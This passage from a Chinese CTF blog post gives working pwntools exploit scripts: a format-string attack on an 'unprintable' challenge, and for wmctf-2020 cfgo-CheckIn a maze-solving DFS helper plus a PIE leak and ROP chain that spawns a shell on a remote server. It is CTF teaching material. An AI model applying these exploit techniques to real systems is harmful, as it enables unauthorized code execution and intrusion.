<span class="number">0x4006E8</span></span><br><span class="line">mmm_call = <span class="number">0x400810</span></span><br><span class="line">pop_rsp_ppp_ret = <span class="number">0x40082d</span></span><br><span class="line">pop_rbx_ppppp_ret = <span class="number">0x40082A</span></span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"./unprintable"</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"your gift: "</span>)</span><br><span class="line">stack = int(r.recvuntil(<span class="string">"\n"</span>), <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">"%"</span> + str(<span class="number">0x601100</span> - <span class="number">0x600dd8</span>) + <span class="string">"c%26$n"</span></span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>, <span class="string">"\x00"</span>)</span><br><span class="line">payload += p64(<span class="number">0x4007A3</span>)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">offset = (stack % <span class="number">0x10000</span> - <span class="number">0x118</span>) % <span class="number">0x100</span></span><br><span class="line"><span class="keyword">if</span> offset &lt; <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%18$hhn"</span> + <span class="string">"%"</span> + str(<span class="number">0xA3</span> - offset) + <span class="string">"c%23$hhn"</span></span><br><span class="line"><span class="keyword">elif</span> offset == <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%18$hhn%23$hhn"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(<span class="number">0xA3</span>) + <span class="string">"c%23$hhn"</span> + <span class="string">"%"</span> + str(offset - <span class="number">0xA3</span>) + <span class="string">"c%18$hhn"</span></span><br><span class="line">payload += <span class="string">"\x00"</span></span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">offset = <span class="number">0x1100</span></span><br><span class="line"><span class="keyword">if</span> offset &lt; <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%13$lln"</span> + <span class="string">"%"</span> + str(<span class="number">0xA3</span> - offset) + <span class="string">"c%23$hhn"</span></span><br><span class="line"><span class="keyword">elif</span> offset == <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%13$lln%23$hhn"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(<span class="number">0xA3</span>) + <span class="string">"c%23$hhn"</span> + <span class="string">"%"</span> + str(offset - <span class="number">0xA3</span>) + <span class="string">"c%13$lln"</span></span><br><span class="line">payload += <span class="string">"\x00"</span></span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">offset = (stack % <span class="number">0x10000</span> - <span class="number">0x116</span>) % <span class="number">0x100</span></span><br><span class="line"><span class="keyword">if</span> offset &lt; <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%18$hhn"</span> + <span class="string">"%"</span> + str(<span class="number">0xA3</span> - offset) + <span class="string">"c%23$hhn"</span></span><br><span class="line"><span class="keyword">elif</span> offset == <span class="number">0xA3</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%18$hhn%23$hhn"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(<span class="number">0xA3</span>) + <span class="string">"c%23$hhn"</span> + <span class="string">"%"</span> + str(offset - <span class="number">0xA3</span>) + <span class="string">"c%18$hhn"</span></span><br><span class="line">payload += <span class="string">"\x00"</span></span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(r, "b * 0x4006E8")</span></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">offset = <span class="number">0x60</span></span><br><span class="line"><span class="keyword">if</span> offset &lt; <span class="number">0x82d</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%13$hhn"</span> + <span class="string">"%"</span> + str(<span class="number">0x82d</span> - offset) + <span class="string">"c%23$hn"</span></span><br><span class="line"><span class="keyword">elif</span> offset == <span class="number">0x82d</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(offset) + <span class="string">"c%13$hhn%23$hn"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    payload = <span class="string">"%"</span> + str(<span class="number">0x82d</span>) + <span class="string">"c%23$hn"</span> + <span class="string">"%"</span> + str(offset - <span class="number">0x82d</span>) + <span class="string">"c%13$hhn"</span></span><br><span class="line">payload += <span class="string">"\x00"</span></span><br><span class="line">payload = payload.ljust(<span class="number">0xa0</span>, <span class="string">"\x00"</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">3</span></span><br><span class="line">payload += p64(pop_rbx_ppppp_ret) + p64(<span class="number">0</span>) + p64(<span class="number">0x601040</span> - <span class="number">0x48</span>) + p64(<span class="number">0x601200</span>) + p64(<span class="number">0xffd2bc07</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(mmm_call)</span><br><span class="line">payload += p64(pop_rbx_ppppp_ret) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x601040</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(<span class="number">0x400819</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x1a0</span>, <span class="string">"\x00"</span>)</span><br><span class="line">payload += p64(adc)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"stack: "</span> + hex(stack)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>由于<code>stdout</code>被<code>close</code>,这里使用<code>cat flag &gt;&amp; 2</code>.</p>
<h2 id="wmctf-2020-cfgo-checkin">wmctf-2020-cfgo-CheckIn</h2>
<p><code>dfs</code>过<code>100</code>关,发现一个栈溢出,通过覆盖<code>println</code>函数栈上的参数泄露<code>pie</code>地址,部分覆盖返回地址跳回<code>backdoor</code>(这里要爆破<code>1/16</code>).</p>
<p>然后泄露链式栈地址用于定位<code>/bin/sh</code>参数,最后<code>ROP</code>获得<code>shell</code>.</p>
<p><code>dfs</code>代码.</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">dfs</span><span class="params">(<span class="keyword">char</span> a[<span class="number">1000</span>][<span class="number">1000</span>], <span class="keyword">char</span> * answer, <span class="keyword">int</span> x, <span class="keyword">int</span> y)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(x &gt; <span class="number">0</span> &amp;&amp; a[x - <span class="number">1</span>][y] == <span class="number">5</span>) &#123;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'w'</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(x &lt; <span class="number">999</span> &amp;&amp; a[x + <span class="number">1</span>][y] == <span class="number">5</span>) &#123;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'s'</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(y &gt; <span class="number">0</span> &amp;&amp; a[x][y - <span class="number">1</span>] == <span class="number">5</span>) &#123;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'a'</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(y &lt; <span class="number">999</span> &amp;&amp; a[x][y + <span class="number">1</span>] == <span class="number">5</span>) &#123;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'d'</span>;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(x &gt; <span class="number">0</span> &amp;&amp; a[x - <span class="number">1</span>][y] == <span class="number">1</span>) &#123;</span><br><span class="line">        a[x - <span class="number">1</span>][y] = <span class="number">3</span>;</span><br><span class="line">        a[x][y] = <span class="number">2</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'w'</span>;</span><br><span class="line">        <span class="keyword">if</span>(dfs(a, answer, x - <span class="number">1</span>, y))</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer) - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(x &lt; <span class="number">999</span> &amp;&amp; a[x + <span class="number">1</span>][y] == <span class="number">1</span>) &#123;</span><br><span class="line">        a[x + <span class="number">1</span>][y] = <span class="number">3</span>;</span><br><span class="line">        a[x][y] = <span class="number">2</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'s'</span>;</span><br><span class="line">        <span class="keyword">if</span>(dfs(a, answer, x + <span class="number">1</span>, y))</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer) - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(y &gt; <span class="number">0</span> &amp;&amp; a[x][y - <span class="number">1</span>] == <span class="number">1</span>) &#123;</span><br><span class="line">        a[x][y - <span class="number">1</span>] = <span class="number">3</span>;</span><br><span class="line">        a[x][y] = <span class="number">2</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'a'</span>;</span><br><span class="line">        <span class="keyword">if</span>(dfs(a, answer, x, y - <span class="number">1</span>))</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer) - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(y &lt; <span class="number">999</span> &amp;&amp; a[x][y + <span class="number">1</span>] == <span class="number">1</span>) &#123;</span><br><span class="line">        a[x][y + <span class="number">1</span>] = <span class="number">3</span>;</span><br><span class="line">        a[x][y] = <span class="number">2</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer)] = <span class="string">'d'</span>;</span><br><span class="line">        <span class="keyword">if</span>(dfs(a, answer, x, y + <span class="number">1</span>))</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">        answer[<span class="built_in">strlen</span>(answer) - <span class="number">1</span>] = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span> ;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">find</span><span class="params">(<span class="keyword">char</span> a[<span class="number">1000</span>][<span class="number">1000</span>], <span class="keyword">char</span> * answer)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">int</span> i, j;</span><br><span class="line">    <span class="keyword">int</span> x, y;</span><br><span class="line">    <span class="keyword">for</span>(i = <span class="number">0</span>;i &lt; <span class="number">1000</span>;i++) &#123;</span><br><span class="line">        <span class="keyword">for</span>(j = <span class="number">0</span>;j &lt; <span class="number">1000</span>;j++) &#123;</span><br><span class="line">            <span class="keyword">if</span>(a[i][j] == <span class="number">3</span>) &#123;</span><br><span class="line">                x = i;</span><br><span class="line">                y = j;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    dfs(a, answer, x, y);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> a[<span class="number">1000</span>][<span class="number">1000</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    setvbuf(<span class="built_in">stdin</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">    setvbuf(<span class="built_in">stdout</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">    setvbuf(<span class="built_in">stderr</span>, <span class="number">0L</span>L, <span class="number">2</span>, <span class="number">0L</span>L);</span><br><span class="line">    fflush(<span class="built_in">stdout</span>);</span><br><span class="line">    fflush(<span class="built_in">stdin</span>);</span><br><span class="line">    fflush(<span class="built_in">stderr</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"plz input x:"</span>);</span><br><span class="line">    <span class="keyword">int</span> x;</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">"%d"</span>,&amp;x);</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="keyword">int</span> j;</span><br><span class="line">    <span class="keyword">for</span>(i = <span class="number">0</span>;i &lt; x;i++)&#123;</span><br><span class="line">        <span class="keyword">for</span>(j = <span class="number">0</span>;j &lt; x;j++)</span><br><span class="line">        &#123;</span><br><span class="line">		    <span class="keyword">int</span> m = <span class="number">0</span>;</span><br><span class="line">        	<span class="built_in">scanf</span>(<span class="string">"%d"</span>, &amp;m);</span><br><span class="line">        	a[i][j] = m;</span><br><span class="line">	    &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">char</span> * answer;</span><br><span class="line">    answer = <span class="built_in">malloc</span>(<span class="number">0x1000</span>);</span><br><span class="line">    find(a, answer);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"your answer\n"</span>);</span><br><span class="line">    <span class="built_in">puts</span>(answer);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>exp</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.aslr = <span class="keyword">False</span></span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">'81.68.174.63'</span>, <span class="number">62176</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getline</span><span class="params">()</span>:</span></span><br><span class="line">	a = r.recvline()</span><br><span class="line">	<span class="keyword">return</span> a</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span><span class="params">(s,l)</span>:</span></span><br><span class="line">	b = []</span><br><span class="line">	i = <span class="number">0</span></span><br><span class="line">	<span class="keyword">while</span> i &lt; l - <span class="number">1</span>:</span><br><span class="line">		<span class="keyword">if</span> s[i] == <span class="string">'\xe2'</span>:</span><br><span class="line">			<span class="keyword">if</span> s[i + <span class="number">2</span>] == <span class="string">'\x9b'</span>:</span><br><span class="line">				b.append(<span class="string">'0'</span>)</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				b.append(<span class="string">'1'</span>)</span><br><span class="line">			i = i + <span class="number">3</span></span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="keyword">if</span> s[i + <span class="number">3</span>] == <span class="string">'\xa9'</span> <span class="keyword">and</span> s[i + <span class="number">2</span>] == <span class="string">'\x9a'</span>:</span><br><span class="line">				b.append(<span class="string">'5'</span>)</span><br><span class="line">			<span class="keyword">else</span>:</span><br><span class="line">				b.append(<span class="string">'3'</span>)</span><br><span class="line">			i = i + <span class="number">4</span></span><br><span class="line">	<span class="keyword">return</span> b</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getmap</span><span class="params">(x)</span>:</span></span><br><span class="line">	m = []</span><br><span class="line">	a = getline()</span><br><span class="line">	n = len(a)</span><br><span class="line">	a = change(a,n)</span><br><span class="line">	m.append(a)</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(x):</span><br><span class="line">		a = getline()</span><br><span class="line">		n = len(a)</span><br><span class="line">		a = change(a,n)</span><br><span class="line">		m.append(a)</span><br><span class="line">	<span class="keyword">return</span> x + <span class="number">1</span>, m</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pas</span><span class="params">()</span>:</span></span><br><span class="line">	x = <span class="number">6</span></span><br><span class="line">	l = <span class="number">0</span></span><br><span class="line">	mm = []</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">100</span>):</span><br><span class="line">		help = process(<span class="string">'csftql'</span>)</span><br><span class="line">		help.recvuntil(<span class="string">"plz input x:"</span>);</span><br><span class="line">		help.sendline(str(x + i));</span><br><span class="line">		r.recvline()</span><br><span class="line">		l, mm = getmap(x + i - <span class="number">1</span>)</span><br><span class="line">		<span class="keyword">for</span> j <span class="keyword">in</span> range(x + i):</span><br><span class="line">			<span class="keyword">for</span> k <span class="keyword">in</span> range(x + i):</span><br><span class="line">				help.sendline(mm[j][k]);</span><br><span class="line">		help.recvuntil(<span class="string">"your answer"</span>);</span><br><span class="line">		answer = help.recvline()</span><br><span class="line">		answer = help.recvline()</span><br><span class="line">		r.send(answer)</span><br><span class="line">		help.close()</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"level "</span> + str(i) + <span class="string">" ok!"</span></span><br><span class="line">		<span class="keyword">print</span> answer</span><br><span class="line"></span><br><span class="line">pas()</span><br><span class="line"><span class="comment"># gdb.attach(r, "b * 0x743c9 + 0x555555554000")</span></span><br><span class="line"><span class="comment"># raw_input()</span></span><br><span class="line">r.sendline(<span class="string">'a'</span> * <span class="number">0x70</span> + p64(<span class="number">0xc000000030</span>) + p64(<span class="number">8</span>) + p64(<span class="number">0</span>) + <span class="string">'B'</span> * <span class="number">0x88</span> + <span class="string">'\xF0\xD0'</span>)</span><br><span class="line">r.recvuntil(<span class="string">"Your name is : "</span>)</span><br><span class="line">leak = u64(r.recv(<span class="number">8</span>)) + <span class="number">0x555555554000</span> - <span class="number">0x55555575aac0</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"leak: "</span> + hex(leak) </span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x109d3d</span> + leak</span><br><span class="line">pop_rsi_r15 = <span class="number">0x119c45</span> + leak</span><br><span class="line">pop_rdx_adc_rax = <span class="number">0x79e6e</span> + leak</span><br><span class="line">syscall = <span class="number">0x743c9</span> + leak</span><br><span class="line">pop_rax_ret = <span class="number">0x74e29</span> + leak</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x70</span> + p64(<span class="number">0xc000000030</span>) + p64(<span class="number">8</span>) + p64(<span class="number">0</span>) + <span class="string">'B'</span> * <span class="number">0x88</span></span><br><span class="line">payload += p64(pop_rdx_adc_rax) + p64(<span class="number">0x8</span>)</span><br><span class="line">payload += p64(pop_rsi_r15) + p64(<span class="number">0xc000000030</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rax_ret) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(syscall)</span><br><span class="line">payload += p64(pop_rdx_adc_rax) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rsi_r15) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">0xc000000030</span>)</span><br><span class="line">payload += p64(pop_rax_ret) + p64(<span class="number">0x3b</span>)</span><br><span class="line">payload += p64(syscall)</span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>

    

    
    
    

    

    
       
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/posts/d1f521aa/" rel="next" title="IS-pwn-Linux-基础">
                <i class="fa fa-chevron-left"></i> IS-pwn-Linux-基础
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/posts/e9037fb1/" rel="prev" title="IS-pwn-Linux-格式化字符串漏洞">
                IS-pwn-Linux-格式化字符串漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/apple-touch-icon.png" alt="w4rd3n">
            
              <p class="site-author-name" itemprop="name">w4rd3n</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">122</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">36</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/hitworld" title="GitHub &rarr; https://github.com/hitworld" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#概念"><span class="nav-number">1.</span> <span class="nav-text">概念</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用方法"><span class="nav-number">2.</span> <span class="nav-text">利用方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#return-2-shellcode"><span class="nav-number">2.1.</span> <span class="nav-text">Return-2-Shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#return-2-libc"><span class="nav-number">2.2.</span> <span class="nav-text">Return-2-libc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#return-2-csu"><span class="nav-number">2.3.</span> <span class="nav-text">Return-2-csu</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过pie"><span class="nav-number">2.4.</span> <span class="nav-text">绕过PIE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过canary"><span class="nav-number">2.5.</span> <span class="nav-text">绕过canary</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#brop"><span class="nav-number">2.6.</span> <span class="nav-text">BROP</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#starctf-2019-blindpwn"><span class="nav-number">2.6.1.</span> <span class="nav-text">starctf-2019-blindpwn</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#stack-pivot"><span class="nav-number">2.7.</span> <span class="nav-text">stack pivot</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#syscall"><span 